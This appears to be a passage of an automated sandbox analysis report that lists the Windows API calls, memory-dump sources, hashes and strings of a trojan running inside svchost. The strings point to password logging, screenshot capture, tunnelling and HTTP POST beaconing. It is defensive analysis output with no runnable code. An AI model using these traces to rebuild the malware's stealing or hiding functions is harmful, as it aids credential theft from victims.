                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02CA5113
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA511D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA5120
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA512D
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA5130
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02CA5148
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA514F
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA515F
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02CA5175
                                                                                                                                                                                                              • htons.WS2_32(00000000), ref: 02CA51A1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02CA51D1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA51D4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02CA51E4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA51E7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1718479325-0
                                                                                                                                                                                                              • Opcode ID: 506f1a530cb887925523c49ab5b8c0fa20c39c1ad18489ef99efd81055c8709d
                                                                                                                                                                                                              • Instruction ID: 13c09ec472a1df7cd4a9f370d9220887e136142fcb82f1855ce572da6f7b4893
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 506f1a530cb887925523c49ab5b8c0fa20c39c1ad18489ef99efd81055c8709d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D441C431E41306ABDB209F65CC58FAE7B68AF84799FD5C614EA05E7180DB71D640CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA5250
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA527C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,0000001C,0000001C), ref: 02CA52A3
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000005), ref: 02CA52D4
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA52FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 02CA5315
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(-00000010), ref: 02CA5323
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA5355
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                              • String ID: $Content-Length: $POST
                                                                                                                                                                                                              • API String ID: 2509092961-2076583852
                                                                                                                                                                                                              • Opcode ID: 4d62b43948faa9ccc5a6eb61d34a229d25fb78688f31b53cdd18382da24f30f7
                                                                                                                                                                                                              • Instruction ID: d839aad3c6a9dbc6ac89ed9ca84405e33f18fb16ede6321b51fb2cb6546f3882
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d62b43948faa9ccc5a6eb61d34a229d25fb78688f31b53cdd18382da24f30f7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F716071D40316EFDB10CFA8D894BAEBBF9FB48758B448629E509E7240D7719A11CFA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAE1D1
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02CAE209
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CAE23D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CAE273
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(00000000), ref: 02CAE2B9
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAB980,00000000,00000000,00000000), ref: 02CAE338
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAE350
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAE361
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CAE387
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CAE3C4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashHandle$CloseCreateExistsFileInformationThreadmemcpymemsetstrstr
                                                                                                                                                                                                              • String ID: <L>$A23C41FB$POST$bsi.dll$pass.log
                                                                                                                                                                                                              • API String ID: 4177962767-489971995
                                                                                                                                                                                                              • Opcode ID: f50fabfa8db815b8ee9def341dcb0815af72ad5f64543294b4d25ae531fbc78b
                                                                                                                                                                                                              • Instruction ID: ba8558e978047bec48b88f44d7f3ef9b2f1816a404b7b524dd003dd3e409d243
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f50fabfa8db815b8ee9def341dcb0815af72ad5f64543294b4d25ae531fbc78b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71512C31D41306DFDB25AF34E8287EA7FA5BB84718F144764E9499B240DB70DA58CBD0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA3821
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA383C
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,74DF0F00,00000000,00000000), ref: 02CA3856
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?,?,?,?,74DF0F00,00000000,00000000), ref: 02CA386C
                                                                                                                                                                                                                • Part of subcall function 02C96C70: memset.MSVCRT ref: 02C96CA1
                                                                                                                                                                                                                • Part of subcall function 02C96C70: memset.MSVCRT ref: 02C96CBF
                                                                                                                                                                                                                • Part of subcall function 02C96C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02C96CDB
                                                                                                                                                                                                                • Part of subcall function 02C96C70: RegQueryValueExA.KERNEL32(?,5DD2BAAFa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02C96D02
                                                                                                                                                                                                                • Part of subcall function 02C96C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C96D7A
                                                                                                                                                                                                                • Part of subcall function 02C96C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C96D81
                                                                                                                                                                                                                • Part of subcall function 02C96C70: memset.MSVCRT ref: 02C96D95
                                                                                                                                                                                                                • Part of subcall function 02C96C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C96DAE
                                                                                                                                                                                                                • Part of subcall function 02C96C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02C96DBC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA38BB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA38C2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA38CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA38D5
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000001,00000000,00000000,/topic.php,?,00000001,00000001,00000001,00000000,00000001,?,?,?,74DF0F00), ref: 02CA394D
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,74DF0F00,00000000,00000000), ref: 02CA395A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA3998
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA399B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA39A7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA39AA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$File$FreeTempValidate$AllocAttributesCloseDeleteNameOpenPathQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: /topic.php
                                                                                                                                                                                                              • API String ID: 870369024-224703247
                                                                                                                                                                                                              • Opcode ID: 336ed19402a7947273d6893ab3410290ce7ca5538a8da404c3b1b8384b2b8a07
                                                                                                                                                                                                              • Instruction ID: 6ec337c64ded41204b2a1a55eac20fbcb5353429b1202597d28109f3a6489d29
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 336ed19402a7947273d6893ab3410290ce7ca5538a8da404c3b1b8384b2b8a07
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B65139B29411596FCB209EB49CA8FEFBB6CEB84304F444A9AF541D7140D771DE84CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CACEA7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CACEE1
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CACEEB
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CACEF3
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CACF04
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CACF0B
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CACF41
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CACF80
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB,?,?), ref: 02CACFC7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorLast$AdminAttributesCreateCurrentFileFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: A23C41FB$\$ctunnel.zip$path_ctunnel.txt
                                                                                                                                                                                                              • API String ID: 2545201083-3597230059
                                                                                                                                                                                                              • Opcode ID: a9eb28be36fe5842f324b46e494e761a3b4b0cd2d50246b514417fba265c4a35
                                                                                                                                                                                                              • Instruction ID: 30c6155c71a7b47bdbaf36d99a9c845a6f82bfd206eb526c84a6aa988a25598a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9eb28be36fe5842f324b46e494e761a3b4b0cd2d50246b514417fba265c4a35
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0151083190524A8FCF15CB24D868BEABBE5EF89304F5486D6D4CAC7201DB71DB88CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C9833C
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,?,?,02C98212,00000000,00000000), ref: 02C98343
                                                                                                                                                                                                              • SetThreadDesktop.USER32(00000000,?,?,02C98212,00000000,00000000), ref: 02C9834F
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: GetTickCount.KERNEL32 ref: 02C9DA2D
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02C9DA3E
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CDF5A0), ref: 02C9DA6A
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C9DA83
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CDF54C), ref: 02C9DAB0
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C9DAC3
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: CreateMutexA.KERNEL32(00000000,00000000,02CDF670), ref: 02C9DAE1
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02C9DAFF
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 02C9DB20
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: SetNamedSecurityInfoA.ADVAPI32(02CDF670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02C9DB3D
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: LocalFree.KERNEL32(00000000), ref: 02C9DB47
                                                                                                                                                                                                                • Part of subcall function 02C9DC50: memset.MSVCRT ref: 02C9DC69
                                                                                                                                                                                                                • Part of subcall function 02C9DC50: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02C9DC82
                                                                                                                                                                                                                • Part of subcall function 02CB9F50: malloc.MSVCRT ref: 02CB9F62
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02C983E7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02C983F5
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,fuck), ref: 02C983FF
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: IsNetworkAlive.SENSAPI(02C96E0D,00000000), ref: 02CA4F93
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: IsUserAnAdmin.SHELL32 ref: 02CA4FA1
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: DnsFlushResolverCache.DNSAPI ref: 02CA4FAB
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: memset.MSVCRT ref: 02CA4FC8
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02CA4FE7
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02CA5000
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CA5013
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: memset.MSVCRT ref: 02CA502C
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02CA5045
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02CA5058
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CA5065
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02C984A2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C984B1
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C984E0
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C984EF
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C984FD
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 02C98506
                                                                                                                                                                                                              • Sleep.KERNEL32(00002710,?,00000000), ref: 02C9854C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFileObjectSecuritySingleWait$DescriptorHeapThreadmemset$AllocCheckConnectionDesktopInternetMappingMutexViewlstrcpyn$AdminAliveCacheConvertCountCurrentEventFlushFreeInfoLocalNamedNetworkReleaseResolverSaclSleepStringTickUserVersionlstrcpymalloc
                                                                                                                                                                                                              • String ID: SYSTEM!818225!C1B4E9D4$fuck
                                                                                                                                                                                                              • API String ID: 379441473-3112549398
                                                                                                                                                                                                              • Opcode ID: 3b9242ab726cacff2309087f073cb79b06947f9381249dc1089c5b14262eb757
                                                                                                                                                                                                              • Instruction ID: e675ca088fe07e160447197435d1854fd1cb47548a744db9b08a9ef2a9d27e2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b9242ab726cacff2309087f073cb79b06947f9381249dc1089c5b14262eb757
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5751E3B5981341AFEB10EF64E84CFA63BE9BB85314F054BA9E5598F291C770E814CF60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CECF94), ref: 02CB3367
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB33A9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB33B5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB33B9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB33CA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB33D1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB3402
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB3408
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB340C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB341D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB3424
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB3452
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02CB3468
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                              • API String ID: 224938940-1670482240
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CB31EC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB31FD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB3211
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB321F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB3080,00000000,00000000,00000000), ref: 02CB3234
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 02CB3245
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CB324A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB325E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB326C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB3277
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,A23C4505,RFK), ref: 02CB3291
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB329A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: A23C4505$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              • API String ID: 505831200-3894408006
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02C9A25E
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindowLongA.USER32(02C9CE3A,000000F0), ref: 02C9E26B
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetLastActivePopup.USER32(02C9CE3A), ref: 02C9E279
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000,00000005), ref: 02C9E293
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000), ref: 02C9E296
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindowInfo.USER32(00000000,?), ref: 02C9E2AC
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000,00000004), ref: 02C9E2B5
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000,00000003), ref: 02C9E2EE
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02C9A29F
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,00000000), ref: 02C9A325
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02C9A34C
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02C9A391
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02C9A3E5
                                                                                                                                                                                                                • Part of subcall function 02C9A100: GetTickCount.KERNEL32 ref: 02C9A18A
                                                                                                                                                                                                                • Part of subcall function 02C9A100: GetClassLongA.USER32(00000000,000000E6), ref: 02C9A1DD
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000112,?,?), ref: 02C9A44E
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02C9A479
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02C9A4F5
                                                                                                                                                                                                              • GetSystemMenu.USER32(00000000,00000000), ref: 02C9A514
                                                                                                                                                                                                              • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02C9A538
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C9A5A3
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02C9A5B6
                                                                                                                                                                                                              • PostMessageA.USER32(?,?,00000001,00000000), ref: 02C9A5D9
                                                                                                                                                                                                              • PostMessageA.USER32(?,?,00000002,00000000), ref: 02C9A5FB
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02C9A633
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C9A65D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590198697-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,7604DB30), ref: 00401EC6
                                                                                                                                                                                                              • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,7604DB30), ref: 00401EE2
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                              • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,759A5430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
